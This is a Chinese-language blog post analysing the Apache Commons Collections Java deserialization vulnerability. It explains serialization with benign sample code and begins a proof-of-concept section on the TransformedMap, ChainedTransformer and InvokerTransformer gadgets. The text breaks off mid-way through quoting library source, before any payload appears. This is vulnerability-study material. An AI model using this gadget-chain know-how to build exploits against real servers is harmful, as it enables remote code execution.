<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Whatever is worth doing is worth doing well !">
    <meta name="author" content="ssooking">
    
    <title>
        
            Java反序列化漏洞分析 |
        
        ssooking&#39;s notebook
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"ssooking.github.io","root":"/","language":"en","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true,"init_open":false},"style":{"primary_color":"#0066CC","avatar":"/images/avatar.png","favicon":"/images/logo.svg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"Keep writing and Keep moving!"},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":false}}},"local_search":{"enable":true,"preload":false},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":false},"lazyload":{"enable":false},"version":3};
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                ssooking&#39;s notebook
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                HOME
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                ARCHIVES
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                CATEGORIES
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                TAGS
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                ABOUT
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">HOME</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">ARCHIVES</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">CATEGORIES</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">TAGS</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">ABOUT</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">Java反序列化漏洞分析</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/avatar.png">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">ssooking</span>
                        
                            <span class="author-label">Lv5</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;
        <span class="pc">2016-10-15 00:35:00</span>
        <span class="mobile">2016-10-15 00:35</span>
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">Java反序列化</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h1 id="相关学习资料"><a href="#相关学习资料" class="headerlink" title="相关学习资料"></a>相关学习资料</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">http://www.freebuf.com/vuls/90840.html</span><br><span class="line">https://security.tencent.com/index.php/blog/msg/97</span><br><span class="line">http://www.tuicool.com/articles/ZvMbIne</span><br><span class="line">http://www.freebuf.com/vuls/86566.html</span><br><span class="line">http://sec.chinabyte.com/435/13618435.shtml</span><br><span class="line">http://www.myhack58.com/Article/html/3/62/2015/69493_2.htm</span><br><span class="line">http://blog.nsfocus.net/java-deserialization-vulnerability-comments/</span><br><span class="line">http://www.ijiandao.com/safe/cto/18152.html</span><br><span class="line">https://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/</span><br><span class="line">http://www.cnblogs.com/dongchi/p/4796188.html</span><br><span class="line">https://blog.chaitin.com/2015-11-11_java_unserialize_rce/?from=timeline&amp;isappinstalled=0#h4_漏洞利用实例 </span><br></pre></td></tr></table></figure>

<h1 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h1><p>　　2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客，阐述了利用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例，各大Java Web Server纷纷躺枪，这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。而在将近10个月前， Gabriel Lawrence 和Chris Frohoff 就已经在AppSecCali上的一个报告里提到了这个漏洞利用思路。　</p>
<p>　　目前，针对这个”2015年最被低估”的漏洞，各大受影响的Java应用厂商陆续发布了修复后的版本，Apache Commons Collections项目也对存在漏洞的类库进行了一定的安全处理。但是网络上仍有大量网站受此漏洞影响。</p>
<h1 id="认识Java序列化与反序列化"><a href="#认识Java序列化与反序列化" class="headerlink" title="认识Java序列化与反序列化"></a>认识Java序列化与反序列化</h1><p><strong>定义：</strong></p>
<p>　　序列化就是把对象的状态信息转换为字节序列(即可以存储或传输的形式)过程<br>　　反序列化即逆过程，由字节流还原成对象<br>　　注： 字节序是指多字节数据在计算机内存中存储或者网络传输时各字节的存储顺序。</p>
<p><strong>用途：</strong> </p>
<p>　　1） 把对象的字节序列永久地保存到硬盘上，通常存放在一个文件中；<br>　　2） 在网络上传送对象的字节序列。</p>
<p> <strong>应用场景：</strong></p>
<p>　　1) 一般来说，服务器启动后，就不会再关闭了，但是如果逼不得已需要重启，而用户会话还在进行相应的操作，这时就需要使用序列化将session信息保存起来放在硬盘，服务器重启后，又重新加载。这样就保证了用户信息不会丢失，实现永久化保存。</p>
<p>　　2) 在很多应用中，需要对某些对象进行序列化，让它们离开内存空间，入住物理硬盘，以便减轻内存压力或便于长期保存。</p>
<p>　　　 比如最常见的是Web服务器中的Session对象，当有 10万用户并发访问，就有可能出现10万个Session对象，内存可能吃不消，于是Web容器就会把一些seesion先序列化到硬盘中，等要用了，再把保存在硬盘中的对象还原到内存中。</p>
<p>　　例子： 淘宝每年都会有定时抢购的活动，很多用户会提前登录等待，长时间不进行操作，一致保存在内存中，而到达指定时刻，几十万用户并发访问，就可能会有几十万个session，内存可能吃不消。这时就需要进行对象的活化、钝化，让其在闲置的时候离开内存，将信息保存至硬盘，等要用的时候，就重新加载进内存。</p>
<p><strong>Java中的API实现：</strong> </p>
<p>　　位置： <strong>Java.io.ObjectOutputStream 　java.io.ObjectInputStream</strong></p>
<p>　　<strong>序列化：</strong> <strong><code>ObjectOutputStream</code>类 –&gt; <code>writeObject()</code></strong></p>
<blockquote>
<p>注：该方法对参数指定的obj对象进行序列化，把字节序列写到一个目标输出流中按Java的标准约定是给文件一个.ser扩展名</p>
</blockquote>
<p>　　<strong>反序列化:</strong>　<strong><code>ObjectInputStream</code>类 –&gt; <code>readObject() 　</code></strong></p>
<blockquote>
<p> 注：该方法从一个源输入流中读取字节序列，再把它们反序列化为一个对象，并将其返回。</p>
</blockquote>
<p>简单测试代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">import java.io.ObjectOutputStream;</span></span><br><span class="line"><span class="comment">import java.io.ObjectInputStream;</span></span><br><span class="line"><span class="comment">import java.io.FileOutputStream;</span></span><br><span class="line"><span class="comment">import java.io.FileInputStream;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Java_Test</span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String args[])</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">obj</span> <span class="operator">=</span> <span class="string">&quot;ls &quot;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 将序列化对象写入文件object.txt中</span></span><br><span class="line">        <span class="type">FileOutputStream</span> <span class="variable">fos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;aa.ser&quot;</span>);</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">os</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(fos);</span><br><span class="line">        os.writeObject(obj);</span><br><span class="line">        os.close();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 从文件object.txt中读取数据</span></span><br><span class="line">        <span class="type">FileInputStream</span> <span class="variable">fis</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="string">&quot;aa.ser&quot;</span>);</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(fis);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 通过反序列化恢复对象obj</span></span><br><span class="line">        <span class="type">String</span> <span class="variable">obj2</span> <span class="operator">=</span> (String)ois.readObject();</span><br><span class="line">        System.out.println(obj2);</span><br><span class="line">        ois.close();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>　　我们可以看到，先通过输入流创建一个文件，再调用**<code>ObjectOutputStream</code>类的 <code>writeObject方法</code><strong><code>把序列化的数据写入该文件;然后调</code></strong><code>用\**</code>ObjectInputStream<code>类的</code>readObject方法<code>\**</code>**<code>反序列化数据并打印数据内容。</code></p>
<p>　　实现Serializable和Externalizable接口的类的对象才能被序列化。</p>
<p>　　Externalizable接口继承自 Serializable接口，实现Externalizable接口的类完全由自身来控制序列化的行为，而仅实现Serializable接口的类可以采用默认的序列化方式 。<br>　　对象序列化包括如下步骤：<br>　　1） 创建一个对象输出流，它可以包装一个其他类型的目标输出流，如文件输出流；<br>　　2） 通过对象输出流的writeObject()方法写对象。</p>
<p>　　对象反序列化的步骤如下：<br>　　1） 创建一个对象输入流，它可以包装一个其他类型的源输入流，如文件输入流；<br>　　2） 通过对象输入流的readObject()方法读取对象。</p>
<p><strong>代码实例</strong></p>
<p>我们创建一个Person接口，然后写两个方法：</p>
<ul>
<li>序列化方法：   创建一个Person实例，调用函数为其三个成员变量赋值，通过writeObject方法把该对象序列化，写入Person.txt文件中</li>
<li>反序列化方法：调用readObject方法，返回一个经过饭序列化处理的对象。</li>
<li>在测试主类里，我们先序列化Person实例对象，然后又反序列化该对象，最后调用函数获取各个成员变量的值。</li>
</ul>
<p>测试代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.File;</span><br><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.FileNotFoundException;</span><br><span class="line"><span class="keyword">import</span> java.io.FileOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.text.MessageFormat;</span><br><span class="line"><span class="keyword">import</span> java.io.Serializable;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Person</span> <span class="keyword">implements</span> <span class="title class_">Serializable</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 序列化ID</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">long</span> <span class="variable">serialVersionUID</span> <span class="operator">=</span> -<span class="number">5809782578272943999L</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="type">int</span> age;</span><br><span class="line">    <span class="keyword">private</span> String name;</span><br><span class="line">    <span class="keyword">private</span> String sex;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="type">int</span> <span class="title function_">getAge</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> age;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getName</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getSex</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> sex;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setAge</span><span class="params">(<span class="type">int</span> age)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.age = age;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setName</span><span class="params">(String name)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.name = name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setSex</span><span class="params">(String sex)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.sex = sex;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * &lt;p&gt;ClassName: SerializeAndDeserialize&lt;p&gt;</span></span><br><span class="line"><span class="comment"> * &lt;p&gt;Description: 测试对象的序列化和反序列&lt;p&gt;</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">SerializeDeserialize_readObject</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        SerializePerson();<span class="comment">//序列化Person对象</span></span><br><span class="line">        <span class="type">Person</span> <span class="variable">p</span> <span class="operator">=</span> DeserializePerson();<span class="comment">//反序列Perons对象</span></span><br><span class="line">        System.out.println(MessageFormat.format(<span class="string">&quot;name=&#123;0&#125;,age=&#123;1&#125;,sex=&#123;2&#125;&quot;</span>,</span><br><span class="line">                                                 p.getName(), p.getAge(), p.getSex()));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * MethodName: SerializePerson</span></span><br><span class="line"><span class="comment">     * Description: 序列化Person对象</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">SerializePerson</span><span class="params">()</span> <span class="keyword">throws</span> FileNotFoundException,</span><br><span class="line">            IOException &#123;</span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Person</span>();</span><br><span class="line">        person.setName(<span class="string">&quot;ssooking&quot;</span>);</span><br><span class="line">        person.setAge(<span class="number">20</span>);</span><br><span class="line">        person.setSex(<span class="string">&quot;男&quot;</span>);</span><br><span class="line">        <span class="comment">// ObjectOutputStream 对象输出流，将Person对象存储到Person.txt文件中，完成对Person对象的序列化操作</span></span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oo</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">&quot;Person.txt&quot;</span>)));</span><br><span class="line">        oo.writeObject(person);</span><br><span class="line">        System.out.println(<span class="string">&quot;Person对象序列化成功！&quot;</span>);</span><br><span class="line">        oo.close();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * MethodName: DeserializePerson</span></span><br><span class="line"><span class="comment">     * Description: 反序列Perons对象</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> Person <span class="title function_">DeserializePerson</span><span class="params">()</span> <span class="keyword">throws</span> Exception, IOException &#123;</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">&quot;Person.txt&quot;</span>)));</span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">            FileInputStream fis = new FileInputStream(&quot;Person.txt&quot;); </span></span><br><span class="line"><span class="comment">            ObjectInputStream ois = new ObjectInputStream(fis);</span></span><br><span class="line"><span class="comment">        */</span></span><br><span class="line">        <span class="type">Person</span> <span class="variable">person</span> <span class="operator">=</span> (Person) ois.readObject();</span><br><span class="line">        System.out.println(<span class="string">&quot;Person对象反序列化成功！&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> person;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="理解漏洞的产生"><a href="#理解漏洞的产生" class="headerlink" title="理解漏洞的产生"></a>理解漏洞的产生</h1><p> <strong>漏洞是怎么来的呢？</strong></p>
<p>　　我们既然已经知道了序列化与反序列化的过程，那么如果反序列化的时候，这些即将被反序列化的数据是我们特殊构造的呢！</p>
<p>　　如果Java应用对用户输入，即不可信数据做了反序列化处理，那么攻击者可以通过构造恶意输入，让反序列化产生非预期的对象，非预期的对象在产生过程中就有可能带来任意代码执行。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p><strong>从Apache Commons Collections说起</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">项目地址</span><br><span class="line">官网：        http://commons.apache.org/proper/commons-collections/ </span><br><span class="line">Github:　　https://github.com/apache/commons-collections</span><br></pre></td></tr></table></figure>

<p>　　 由于对java序列化&#x2F;反序列化的需求，开发过程中常使用一些公共库。</p>
<p>　　 Apache Commons Collections 是一个扩展了Java标准库里的Collection结构的第三方基础库。它包含有很多jar工具包如下图所示，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。</p>
<p>　　org.apache.commons.collections提供一个类包来扩展和增加标准的Java的collection框架，也就是说这些扩展也属于collection的基本概念，只是功能不同罢了。Java中的collection可以理解为一组对象，collection里面的对象称为collection的对象。具象的collection为<strong>set，list，queue</strong>等等，它们是<strong>集合类型</strong>。换一种理解方式，collection是set，list，queue的抽象。</p>
<p>　　<img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170909.png" alt="img">　</p>
<p>　　作为Apache开源项目的重要组件，Commons Collections被广泛应用于各种Java应用的开发，而正是因为在大量web应用程序中这些类的实现以及方法的调用，导致了反序列化用漏洞的普遍性和严重性。　</p>
<p>　　 Apache Commons Collections中有一个特殊的接口，其中有一个实现该接口的类可以通过调用Java的反射机制来<strong>调用任意函数</strong>，叫做InvokerTransformer。</p>
<blockquote>
<p>什么事JAVA反射机制？<br>    在运行状态中：<br>        对于任意一个类，都能够判断一个对象所属的类；<br>　    对于任意一个类，都能够知道这个类的所有属性和方法；<br>　　对于任意一个对象，都能够调用它的任意一个方法和属性；<br>这种动态获取的信息以及动态调用对象的方法的功能称为java语言的反射机制。</p>
</blockquote>
<p> 　这里涉及到了很多概念，不要着急，接下来我们就来详细的分析一下。</p>
<h1 id="POC构造"><a href="#POC构造" class="headerlink" title="POC构造"></a>POC构造</h1><p>　　经过对前面序列与反序列化的了解，我们蠢蠢欲动。那么怎样利用这个漏洞呢？</p>
<p>　　一丁点儿思路：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">构造一个对象 —— 反序列化 —— 提交数据</span><br></pre></td></tr></table></figure>

<p>　　OK? 我们现在遇到的关键问题是： 什么样对象符合条件？如何执行命令？怎样让它在被反序列化的时候执行命令？</p>
<p>　　首先，我们可以知道，要想在java中调用外部命令，可以使用这个函数 Runtime.getRuntime().exec()，然而，我们现在需要先找到一个对象，可以存储并在特定情况下执行我们的命令。</p>
<p><strong>(1)Map类 –&gt; TransformedMap</strong></p>
<p>　　Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ，该类可以在一个元素被添加&#x2F;删除&#x2F;或是被修改时(即key或value：集合中的数据存储形式即是一个索引对应一个值，就像身份证与人的关系那样)，会调用transform方法自动进行特定的修饰变换，具体的变换逻辑由Transformer类定义。<strong>也就是说，TransformedMap类中的数据发生改变时，可以自动对进行一些特殊的变换，比如在数据被修改时，把它改回来; 或者在数据改变时，进行一些我们提前设定好的操作。</strong></p>
<p>　　至于会进行怎样的操作或变换，这是由我们提前设定的，这个叫做transform。等会我们就来了解一下transform。</p>
<p>　　我们可以通过TransformedMap.decorate()方法获得一个TransformedMap的实例</p>
<p><img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170916.png" alt="img"></p>
<p>TransformedMap.decorate方法,预期是对Map类的数据结构进行转化，该方法有三个参数：</p>
<ul>
<li>第一个参数为待转化的Map对象</li>
<li>第二个参数为Map对象内的key要经过的转化方法（可为单个方法，也可为链，也可为空）</li>
<li>第三个参数为Map对象内的value要经过的转化方法</li>
</ul>
<p><strong>(2)Transformer接口</strong> </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Defines a functor interface implemented by classes that transform one object into another.</span><br><span class="line">作用：接口于Transformer的类都具备把一个对象转化为另一个对象的功能</span><br></pre></td></tr></table></figure>

<p>transform的源代码</p>
<p><img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170920.png" alt="img"></p>
<p> 我们可以看到该类接收一个对象，获取该对象的名称，然后调用了一个invoke反射方法。另外，多个Transformer还能串起来，形成ChainedTransformer。当触发时，ChainedTransformer可以按顺序调用一系列的变换。</p>
<p>下面是一些实现Transformer接口的类，箭头标注的是我们会用到的。</p>
<p> <img src="https://gitee.com/ssooking/imgbed/raw/master/img/WebSecurity/20210727170925.png" alt="img"></p>
<p>ConstantTransformer：把一个对象转化为常量，并返回。</p>
<p>InvokerTransformer：通过反射，返回一个对象</p>
<p>ChainedTransformer：ChainedTransformer为链式的Transformer，会挨个执行我们定义Transformer</p>
<p>　　Apache Commons Collections中已经实现了一些常见的Transformer，其中有一个可以<strong>通过Java的反射机制来调用任意函数</strong>，叫做InvokerTransformer，代码如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">InvokerTransformer</span> <span class="keyword">implements</span> <span class="title class_">Transformer</span>, Serializable &#123;</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">        Input参数为要进行反射的对象，</span></span><br><span class="line"><span class="comment">        iMethodName,iParamTypes为调用的方法名称以及该方法的参数类型</span></span><br><span class="line"><span class="comment">        iArgs为对应方法的参数</span></span><br><span class="line"><span class="comment">        在invokeTransformer这个类的构造函数中我们可以发现，这三个参数均为可控参数</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">InvokerTransformer</span><span class="params">(String methodName, Class[] paramTypes, Object[] args)</span> &#123;</span><br><span class="line">        <span class="built_in">super</span>();</span><br><span class="line">        iMethodName = methodName;</span><br><span class="line">        iParamTypes = paramTypes;</span><br><span class="line">        iArgs = args;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> Object <span class="title function_">transform</span><span class="params">(Object input)</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (input == <span class="literal">null</span>) &#123;</span><br><span class="line">            <span 